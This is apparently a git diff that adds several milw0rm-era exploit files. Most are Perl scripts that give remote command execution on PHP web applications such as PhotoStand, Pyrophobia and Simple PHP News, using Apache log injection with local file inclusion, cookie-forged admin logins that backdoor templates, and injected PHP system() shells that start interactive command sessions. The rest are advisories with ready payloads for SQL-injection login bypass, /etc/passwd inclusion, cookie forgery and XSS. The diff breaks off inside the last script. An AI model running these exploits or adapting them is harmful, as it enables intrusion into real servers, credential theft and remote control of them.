/usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + /apache/logs/access.log + ); + +my $php_code = ""; + +($host,$lfi_path) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +$sock = IO::Socket::INET->new( + PeerAddr => $h0st, + PeerPort => 80, + Proto => "tcp" + ) || die "Can't connect to $host:80!\n"; + +print "[*] Injecting evil php code ..\n"; + + +print $sock "GET /Osirys_log_inj start0".$php_code."0end HTTP/1.1\r\n"; +print $sock "Host: ".$host."\r\n"; +print $sock "Connection: close\r\n\r\n"; +close($sock); + +print "[*] Cheeking for Apache Logs ..\n"; + +while (($log = <@logs_dirs>)&&($gotcha != 1)) { + $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte; + $re = get_req($tmp_path); + if ($re =~ /Osirys_log_inj/) { + $gotcha = 1; + $log_path = $tmp_path; + print "[*] Apache Log Injection completed\n"; + print "[*] Path: $log\n"; + print "[!] Hi my master, do your job now [x]\n\n"; + &exec_cmd; + } +} + +$gotcha == 1 || die "[-] Couldn't find Apache Logs\n"; + +sub exec_cmd { + my @outs; + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $log_path."&cmd=".$cmd; + $re = get_req($exec_url); + if ($re =~ /start0(.+?)0end/sg) { + if ($1 =~ /0end/) { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + else { + push(@outs,$1); + foreach my $o(@outs) { + print "$o"; + } + &exec_cmd; + } + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " --------------------------------- \n". + " PHPbbBook RCE Exploit \n". + " via Log Inj \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path lfi_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-04] \ No newline at end of file diff --git a/PhotoStand 1.2.0 - Remote Command Execution.pl b/PhotoStand 1.2.0 - Remote Command Execution.pl new file mode 100644 index 0000000..193bc06 --- /dev/null +++ b/PhotoStand 1.2.0 - Remote Command Execution.pl @@ -0,0 +1,257 @@ +#!/usr/bin/perl + +# App : PhotoStand 1.2.0 +# Site : http://www.photostand.org +# Remote Command Execution Exploit +# Credits to : Giovanni Buzzin, "Osirys" +# osirys[at]autistici[dot]org +# Greets: drosophila, emgent, Fireshot + +# PhotoStand is a used Image Gallery CMS. +# PhotoStand is vulnerable to SQL Injection, (AUTH BYPASS), creating a cookie with the nick of the admin encoded in BASE64, +# a remote user is able to become Admin. The exploit just bypass the login, and edits the template putting in it code prone +# to RCE. It doesn't change anything, in fact it gets the previous template, and just adds the hell code. +# ENJOY + +# Google Dork: powered by PhotoStand Design by Vlad + +# ------------------------------------------------------------------------------------- +# Exploit tested in Local : +# ------------------------------------------------------------------------------------- +# osirys[~]>$ perl r0x.txt http://localhost/photostand_1.2.0/photostand_1.2.0/ admin +# +# ---------------------------- +# Photobase RCE Exploit +# Coded by Osirys +# ---------------------------- +# +# [*] Bypassing Admin Login with a evil cookie ! +# [+] SESSION ID grabbed: sbt9f85ps9n29an2d31911n806 +# [*] Admin Login Bypassed ! +# [*] Template source Found, editing it .. +# [*] Template edited, backdoored !! +# [*] Shell succesfully spawned !! +# [:D Hi myLord, execute your commands !! +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/photostand_1.2.0/photostand_1.2.0/templates/Simplified +# shell[localhost]$> exit +# [-] Quitting .. +# +# osirys[~]>$ +# ------------------------------------------------------------------------------------- + +use HTTP::Request; +use LWP::UserAgent; +use IO::Socket; +use URI::Escape; +use MIME::Base64; + +my $host = $ARGV[0]; +my $user = $ARGV[1]; +my $rand = int(rand 150); +my $rand1 = "1337".$rand; +my $rce = "$rand1
\";system(§§§_GET[cmd]);echo \"$rand1
\";}?>"; +my $rce_p = "/templates/Simplified/index.php?cmd="; + +chomp($user); +$cookie = encode_base64($user); +$cookie =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg; +$cookie =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; + +help("-1") unless (($host)&&($user)); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_data($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Bypassing Admin Login with a evil cookie !\n"; +socket_req("GET",$path."/admin/index.php",$cookie,"",1); +$phpsessid || die "\n[-] Can't login with evil Cookie !\n\n"; +$cookie .= "; PHPSESSID=".$phpsessid; +socket_req("GET",$path."/admin/newart.php",$cookie,"",2,"New article<\/title>"); +$gotcha == 1 || die "\n[-] Can't login with evil Cookie !\n\n"; +print "[*] Admin Login Bypassed !\n"; +socket_req("GET",$path."/admin/options.php?page=editor&edit=Simplified",$cookie,"",3); + +my $re = join '', @tmp_out; +my $content = tag($re); +if ($content =~ /class="textbox">(.+)<\/textarea>/) { + $template = $1; + print "[*] Template source Found, editing it ..\n"; +} +else { + print "[-] Template source not Found, exiting ..\n"; + exit(0); +} + +$template =~ s/(.+)/$rce$1/; +$template =~ s/\*/\n/g; +$template =~ s/\$/ /g; +$template =~ s/§§§/\$/g; +$template =~ s/\( _GET/(\$_GET/g; +my $code = uri_escape($template); +$code =~ s/\(/%28/g; +$code =~ s/\)/%29/g; +$code =~ s/%20/+/g; +$code =~ s/'/%27/g; +$code =~ s/!/%21/g; + +my $post = "action=save&tpid=4&tp=index.php&template=Simplified&type=1&page=editor&editpage=".$code; +socket_req("POST",$path."/admin/options.php",$cookie,$post,0,"",1); + +my $exec_url = ($host.$rce_p."id"); +my $re = get_req($exec_url); +if ($re =~ /uid=/) { + print "[*] Template edited, backdoored !!\n[*] Shell succesfully spawned !!\n[:D Hi myLord, execute your commands !!\n\n"; + &exec_cmd; +} +else { + print "[-] Something wrong, sploit failed !\n\n"; + exit(0); +} + +sub socket_req() { + my($request,$path,$cookie,$content,$opt,$regexp,$sock_opt) = @_; + my $stop; + my $length = length($content); + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die $!; + + if ($sock_opt == 1) { + $opt_1 = "Referer: ".$host."/admin/options.php?page=editor&edit=Simplified\r\n"; + $opt_2 = "Content-Type: application/x-www-form-urlencoded\r\n"; + } + else { + $opt_1 = ""; + $opt_2 = ""; + } + my $data = $request." ".$path." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + $opt_1. + "Cookie: PS-SAVE=".$cookie."\r\n". + $opt_2. + "Content-Length: ".$length."\r\n\r\n". + $content."\r\n"; + + $socket->send($data); + while ((my $e = <$socket>)&&($stop != 1)) { + if ($opt == 0) { + $stop = 1; + } + elsif ($opt == 1) { + if ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) { + $phpsessid = $1; + print "[+] SESSION ID grabbed: $phpsessid\n"; + $stop = 1; + } + } + elsif ($opt == 2) { + if ($e =~ /$regexp/) { + ($stop,$gotcha) = (1,1); + } + } + elsif ($opt == 3) { + push(@tmp_out,$e); + } + + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $host.$rce_p.$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/
$rand1
(.+)$rand1
/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_data() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $h0st !~ /www/ || $h0st =~ s/www\.//; + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " ---------------------------- \n". + " PhotoStand RCE Exploit \n". + " Coded by Osirys \n". + " ---------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad Input!\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_username\n"; + print " admin_username is the nick of the admin.\n\n"; + exit(0); +} + +# milw0rm.com [2009-03-26] \ No newline at end of file diff --git a/Photobase 1.2 - Local File Inclusion.txt b/Photobase 1.2 - Local File Inclusion.txt new file mode 100644 index 0000000..6d3c416 --- /dev/null +++ b/Photobase 1.2 - Local File Inclusion.txt @@ -0,0 +1,45 @@ +[START] + +#################################################################################################################### +[0x01] Informations: + +Script : Photobase 1.2 +Download : http://www.monstar.nl/php-bin/count.php3?what=photobase.zip&id=0 +Vulnerability : Local File Inclusion +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org + + +#################################################################################################################### +[0x02] Bug: [Local File Inclusion] +###### + +Bugged file is: /[path]/include/header.php + +[CODE] + + $language + +[!FIX] Filter $language before the include or just set its value with a local file. + + +[!] EXPLOIT: /[path]/include/header.php?language=[local_file] + ../../../../../../../../../../etc/passwd%00 + +#################################################################################################################### + +[/END] + +# milw0rm.com [2009-01-11] \ No newline at end of file diff --git a/ProQuiz 1.0 - Authentication Bypass.txt b/ProQuiz 1.0 - Authentication Bypass.txt new file mode 100644 index 0000000..85d9146 --- /dev/null +++ b/ProQuiz 1.0 - Authentication Bypass.txt @@ -0,0 +1,32 @@ +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + [0] GENERAL DETAILS: + +Name : ProQuiz 1.0 Sql Injection (Auth bypass) +Download : http://sourceforge.net/project/downloading.php?group_id=246466&use_mirror=kent&filename=ProQuiz.zip&65145754 +Vulnerability : Sql Injection (Admin Login Bypass) +Author : Osirys +Contact : osirys[at]live[dot]it + +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + [1] BUG EXPLANATION: + +The affected file is /admin/index.php. Let's see the code. + +[CODE] +if($_GET['menu'] != 'madmin') + { + if(isset($_POST['username']) && isset($_POST['password'])) + { + $query = "SELECT * FROM ".$member_admin." WHERE `username` = '".$_POST['username']."' AND `password` = '".$_POST['password']."' "; +[/CODE] + +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + [2] EXPLOITATION: + +Just go in /[path]/admin/index.php. Login with the following details: +Username : ' or 1=1# +Password : anything + +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution.pl b/Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution.pl new file mode 100644 index 0000000..4cfd44e --- /dev/null +++ b/Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution.pl @@ -0,0 +1,237 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Pyrophobia 2.1.3.1 | +# |Download : http://surfnet.dl.sourceforge.net/sourceforge/pyrophobia/pyro2_1_3_1.tar.gz | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Command Execution Exploit via Apache Log Injection | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Thx&Greets to: evilsocket, Fireshot, Todd, str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |/[path]/index.php is affected to Local File Inclusion vulnerability: +# |[code] +# | +# | if($_GET['pid']){ //if page id is set do custom content functions +# | $pid=stripslashes($_GET['pid']); +# | $pid=htmlspecialchars($pid); +# | if ($pid=='') { +# | include('modules/index.php'); +# | } elseif (!file_exists('content/'.$pid.'.php')) { +# | include('modules/index.php'); +# | } else { +# | include('content/'.$pid.'.php'); +# | } +# | } +# |<.... code ....> +# |[/code] +# |$pid comes from GET directly. +# |Works regardless of php.ini settings ! +# |p0c : /[path]/index.php?pid=[lfi]%00 + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl lfi.txt http://localhost/pyro2_1_3_1/ +# +# --------------------------------- +# Pyrophobia Forum RCE Sploit +# (Log Inj) +# by Osirys +# --------------------------------- +# +# [*] Injecting evil php code .. +# [*] Cheeking for Apache Logs .. +# [*] Apache Log Injection completed +# [*] Path: /var/log/httpd/access_log +# [!] Hi my master, do your job now [x] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pws +# bash: pws: command not found +# shell[localhost]$> pwd +# /home/osirys/web/pyro2_1_3_1 +# shell[localhost]$> exit +# [-] Quitting .. +# +# osirys[~]>$ +# ------------------------------------------------------------------ + + +use IO::Socket::INET; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $lfi_path = "/index.php?pid="; +my $null_byte = "%00"; +my $rand_a = int(rand 150); +my $rand1 = "1337".$rand_a."1337"; +my $rand_b = int(rand 150); +my $rand2 = "1337".$rand_b."1337"; +my $gotcha = 0; +my $dir_trasv = "../../../../../../../../../.."; +my @logs_dirs = qw( + /var/log/httpd/access_log + /var/log/httpd/access.log + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/access_log + /logs/error.log + /logs/access.log + /var/log/apache/error_log + /var/log/apache/error.log + /etc/httpd/logs/access_log + /usr/local/apache/logs/error_log + /etc/httpd/logs/access.log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /usr/local/apache/logs/access_log + /usr/local/apache/logs/access.log + /var/www/logs/access_log + /var/www/logs/access.log + /var/log/apache/access_log + /var/log/apache/access.log + /var/log/access_log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + /apache/logs/access.log + ); + +my $php_code = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +$sock = IO::Socket::INET->new( + PeerAddr => $h0st, + PeerPort => 80, + Proto => "tcp" + ) || die "Can't connect to $host:80!\n"; + +print "[*] Injecting evil php code ..\n"; + + +print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." HTTP/1.1\r\n"; +print $sock "Host: ".$host."\r\n"; +print $sock "Connection: close\r\n\r\n"; +close($sock); + +print "[*] Cheeking for Apache Logs ..\n"; + +while (($log = <@logs_dirs>)&&($gotcha != 1)) { + $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte; + $re = get_req($tmp_path); + if ($re =~ /Osirys_log_inj/) { + $gotcha = 1; + $log_path = $tmp_path; + print "[*] Apache Log Injection completed\n"; + print "[*] Path: $log\n"; + print "[!] Hi my master, do your job now [x]\n\n"; + &exec_cmd; + } +} + +$gotcha == 1 || die "[-] Couldn't find Apache Logs\n"; + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $log_path."&cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " Pyrophobia Forum RCE Sploit \n". + " (Log Inj) \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/RSMScript 1.21 - Cross-Site Scripting Insecure Cookie Handling.txt b/RSMScript 1.21 - Cross-Site Scripting Insecure Cookie Handling.txt new file mode 100644 index 0000000..2164301 --- /dev/null +++ b/RSMScript 1.21 - Cross-Site Scripting Insecure Cookie Handling.txt @@ -0,0 +1,96 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : RSMScript 1.21 +Download : http://www.hotscripts.com/jump.php?listing_id=78547&jump_type=1 +Vulnerability : Insecure Cookie Handling / XXS +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + +######################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/verify.php + +[CODE] + +if($admin_pass == $code) +{ + setcookie("verified", "null", time()+1800); + header( 'refresh: 0; url=update.php' ); +} + +[/CODE] + +As we can see, if the password "$code" typed is the same of $admin_pass, so you log in, +cookie is set with the name "verified" and with content "null". So, a malicious user +can just set up a cookie with that name and value, and then he will be logged as the +admin. + +[!] FIX: A fix could be to put as a content or cookie name the password. Example: + +[CODE] setcookie("verified", "$admin_pass", time()+1800); [/CODE] + + +[!] EXPLOIT: javascript:document.cookie = "verified=null; path=/"; + +######################################################################################### +[0x03] Bug: [XSS] +###### + +To exploit this bug, we must be logged in. Just bypass the login with the Cookie ;) +There are two bugged file. + +1) /[path/submit.php + In this file, we can put arbitrary data into a .txt file. + + [CODE] + + $quote = $_REQUEST['quote']; + $writePage = fopen('quotes.txt', 'a') or die("can't open file"); + fwrite($writePage, "\t"); + fwrite($writePage, stripslashes($quote)); + fclose($writePage); + + [/CODE] + + [!] FIX: Just filter direct user input. + + +2) /path/update.php + This file gets quotes.txt content, and print it directly into html code. + In 1) we saw that we can put arbitrary data into this .txt file. Just + Put js code ;) + + [CODE] + + $quotes = file_get_contents("quotes.txt"); + $quotes= preg_split("/[\t]+/", $quotes); + $i = 0; + $noQuotes = sizeOf($quotes); + while ($i < $noQuotes) + { + $quote = $quotes[$i]; + echo ''; + $i = $i + 1; + } + + [/CODE] + + [!] FIX: A fix could be just to filter input before being printed in html code. + + +## How to exploit this bugs? + +[!] EXPLOIT: /[path]/submit.php?quote= + +######################################################################################### +[/END] + +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/S40 CMS 0.4.2b - Local File Inclusion.txt b/S40 CMS 0.4.2b - Local File Inclusion.txt new file mode 100644 index 0000000..d145261 --- /dev/null +++ b/S40 CMS 0.4.2b - Local File Inclusion.txt @@ -0,0 +1,93 @@ +[Security Advisory Details: 07/04/2001] + +[Script] S40 CMS 0.4.2 Beta +[Location] http://s40.biz/?p=download +[Vulnerability] Local File Inclusion +[Original Adv] http://y-osirys.com/security/exploits/id27 +[Author] Giovanni Buzzin, "Osirys" +[Site] y-osirys.com +[Contact] osirys[at]autistici[dot]org + + +------------------------------------------------------------------------------------------------------------ +[CMS Description] + +S40 CMS is FREE Content Management System +S40 CMS 0.4 beta is lightwieght flat file CMS written on PHP, suitable for small and medium sites. +S40 is open-source MIT-license CMS developed by AWEN art studio Ltd. +S40 is fast and easy to customize system with build-in installer. + + +------------------------------------------------------------------------------------------------------------ +[Security Flaw] + +S40 CMS is prone to Local File Inclusion vulnerability because of poor security checks and bad input +sanitization: GET variables are not properly sanitized before being included via require() PHP function. + +[code:index.php] + + Simple PHP News 1.0 Final +# Downl => http://www.hotscripts.com/jump.php?listing_id=66376&jump_type=1 + +# Remote Command Execution Exploit +# by Osirys +# osirys[at]autistici[dot]org +# osirys.org +# Thx&Greets to: evilsocket + +# A personal comment : just bleah !! + +# Tested with: Magic Quotes => Off + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl rce_lol.txt http://localhost/php_simple_news/ + +# --------------------------------- +# Simple PHP News RCE Exploit +# by Osirys +# --------------------------------- + +# [*] Adding new evil news .. +# [*] RCE Created ! +# [&] Hi my master, do your job now [!] + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/php_simple_news +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $post_pag = "/post.php"; +my $rce_path = "/display.php"; +my $rand = int(rand 99) +1; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $date = &date; +my $url = $path.$post_pag; + +my $code = "title=Shout&date=".$date. "&post=%3C%3Fphp%0D%0Aecho+". + "%22shoutZ0".$rand."%22%3B%0D%0Aif%28get_magic_quotes_". + "gpc%28%29%29%7B%0D%0A+++%24_GET%5Bcmd%5D%3Dstripslash". + "es%28%24_GET%5Bcmd%5D%29%3B%0D%0A%7D%0D%0Asystem%28%2". + "4_GET%5Bcmd%5D%29%3B%0D%0Aecho+%22-0Ztuohs".$rand."%2". + "2%3B%0D%0A%3F%3E"; + +my $length = length($code); + +my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + +my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + +print "[*] Adding new evil news ..\n"; +$socket->send($data); + +while ((my $e = <$socket>)&&($own != 1)) { + if ($e =~ /Entry added successfully/) { + $own = 1; + print "[*] RCE Created ! \n"; + } +} +$own == 1 || die "[-] Can't send new news !\n"; + +print "[&] Hi my master, do your job now [!]\n\n"; +&exec_cmd; + +sub exec_cmd { + my(@outs,$out); + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host.$rce_path."?cmd=".$cmd; + $re = get_req($exec_url); + $content = tag($re); + if ($content =~ /shoutZ0$rand(.*)-0Ztuohs$rand/) { + $out = $1; + @outs = split //, $out; + foreach my $e(@outs) { + $e =~ s/\*/\n/; + print $e; + } + &exec_cmd; + } + elsif ($content =~ /shoutZ0$rand-0Ztuohs$rand/) { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub date { + my $year = (localtime)[5] + 1900; + my $month = (localtime)[4]; + my $day = (localtime)[3]; + $month =~ s/([0-9]{1})/0$1/ if ($month =~ /[0-9]{1}/); + $day =~ s/([0-9]{1})/0$1/ if ($day =~ /[0-9]{1}/); + my $date = $month."/".$day."/".$year; + return($date); +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/\n/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " Simple PHP News RCE Exploit \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-06] \ No newline at end of file diff --git a/Syzygy CMS 0.3 - Local File Inclusion SQL Injection.pl b/Syzygy CMS 0.3 - Local File Inclusion SQL Injection.pl new file mode 100644 index 0000000..f654d26 --- /dev/null +++ b/Syzygy CMS 0.3 - Local File Inclusion SQL Injection.pl @@ -0,0 +1,238 @@ +#!/usr/bin/perl + +# Web App : Syzygy CMS 0.3 +# Link : http://sourceforge.net/project/downloading.php?group_id=103298&use_mirror=heanet&filename=syzygycms-0.3.tar.gz&a=89932245 +# Remote Command Execution Exploit : +# Case 1: If LFI works, exploitation via Shell Injection + LFI +# Case 2: Unless, exploitation via SQL Command Injection + +# by Giovanni Buzzin, Osirys +# osirys[at]autistici[dot]org +# osirys.org +# Greets: Drosophila + +# ---------------------------------------------------------------------------- +# Exploit Simulation // (Case 1) +# ---------------------------------------------------------------------------- +# osirys[~]>$ perl sploit.txt http://localhost/syzygy/ + +# --------------------------------- +# Syzygy CMS 0.3 RCE sploit +# by Osirys +# --------------------------------- + +# [*] Getting admin login details .. +# [$] User: admin +# [$] Pass: 5f4dcc3b5aa765d61d8327deb882cf99 + +# [*] Testing LFI vulnerability +# [*] LFI works, exploiting it via SQL-LFI + +# [++] Exploiting via SQL-LFI ! +# [*] Creating remote Shell via SQL Injection .. +# [*] Spawning remote Shell via LFI .. + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/syzygy +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# ---------------------------------------------------------------------------- + +use IO::Socket; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $rand = int(rand 50); +my $lfi = "/index.php?page=../../../../../../../../../"; +my $code = ""; +my $file = "/tmp/sh_spawn_ownzzzzz".$rand.".txt"; +my @error_logs = qw( + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/apache/error.log + /var/log/apache/error_log + /var/log/apache2/error.log + /var/log/apache2/error_log + /logs/error.log + /var/log/apache/error_log + /var/log/apache/error.log + /usr/local/apache/logs/error_log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + ); + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Getting admin login details ..\n"; + +my $url = $host."/index.php?page=poll.php&poll=-1 union select 1,concat(0x64657461696C73,username,0x3a,password,0x64657461696C73),0,0,0,0,0,0,0,0,0,0,0,0,0,0 from users"; +my $re = get_req($url); +if ($re =~ /details(.+):(.+)details/) { + my($user,$pass) = ($1,$2); + print "[\$] User: $user\n"; + print "[\$] Pass: $pass\n"; +} +else { + print "[-] Can't extract admin details\n\n"; +} + +print "\n[*] Testing LFI vulnerability\n"; +my $re = get_req($host.$lfi."etc/passwd%00"); +if ($re !~ /root:x/) { + print "[-] LFI seems not working, exploiting it via SQL Command Injection !\n"; + &exploit_2; +} +else { + print "[*] LFI works, exploiting it via SQL-LFI\n"; + &exploit_1; +} + +sub exploit_1 { + print "\n[++] Exploiting via SQL-LFI !\n[*] Creating remote Shell via SQL Injection 